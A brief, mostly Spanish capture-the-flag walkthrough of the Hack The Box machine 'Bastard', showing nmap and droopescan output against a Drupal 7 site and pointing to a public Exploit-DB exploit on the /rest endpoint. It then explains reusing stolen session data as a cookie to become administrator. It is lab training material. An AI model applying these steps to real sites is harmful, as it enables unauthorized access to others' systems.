Empezamos como siempre con NMAP
root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.9 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-16 09:59 CEST Nmap scan report for 10.10.10.9 Host is up (0.018s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 64.94 seconds
Desde aqui ya podemos ver cosas interesantes como logins, changelogs, etc.
Podemos ver desde el scan y accediendo a la pantalla que es Drupal. Asi que usamos droopscan
root@Kali2:~/Downloads# droopescan scan drupal -u 10.10.10.9 [+] Themes found: seven http://10.10.10.9/themes/seven/ garland http://10.10.10.9/themes/garland/ [+] Possible interesting urls found: Default changelog file - http://10.10.10.9/CHANGELOG.txt Default admin - http://10.10.10.9/user/login [+] Possible version(s): 7.54 [+] Plugins found: ctools http://10.10.10.9/sites/all/modules/ctools/ http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt http://10.10.10.9/sites/all/modules/ctools/changelog.txt http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt http://10.10.10.9/sites/all/modules/ctools/API.txt libraries http://10.10.10.9/sites/all/modules/libraries/ http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt http://10.10.10.9/sites/all/modules/libraries/changelog.txt http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT http://10.10.10.9/sites/all/modules/libraries/README.txt http://10.10.10.9/sites/all/modules/libraries/readme.txt http://10.10.10.9/sites/all/modules/libraries/README.TXT http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt services http://10.10.10.9/sites/all/modules/services/ http://10.10.10.9/sites/all/modules/services/README.txt http://10.10.10.9/sites/all/modules/services/readme.txt http://10.10.10.9/sites/all/modules/services/README.TXT http://10.10.10.9/sites/all/modules/services/LICENSE.txt image http://10.10.10.9/modules/image/ profile http://10.10.10.9/modules/profile/ php http://10.10.10.9/modules/php/ [+] Scan finished (0:58:57.307825 elapsed)
You can use https://www.exploit-db.com/exploits/41564 to exploit it with endpoint path in /rest.
Solo que tiene dos errores en las lineas 16 y 71.
SI despues de eso no funciona, es porque CURL no esta instaldo en su kali. Intenten:
root@kali:~/Desktop# apt-get install php-curl root@kali:~/Desktop# systemctl restart apache2
Despues de correrlo tendra dos archivos, un user y un session.
#!/usr/bin/php Stored session information in session.json Stored user information in user.json Cache contains 7 entries
Si copian la información de session a una nueva cookie a session name como name y id como value y refrescan la pagina seran admins 🙂
https://redteamtutorials.com/2018/11/07/hack-the-box-bastard/
empire and sherlock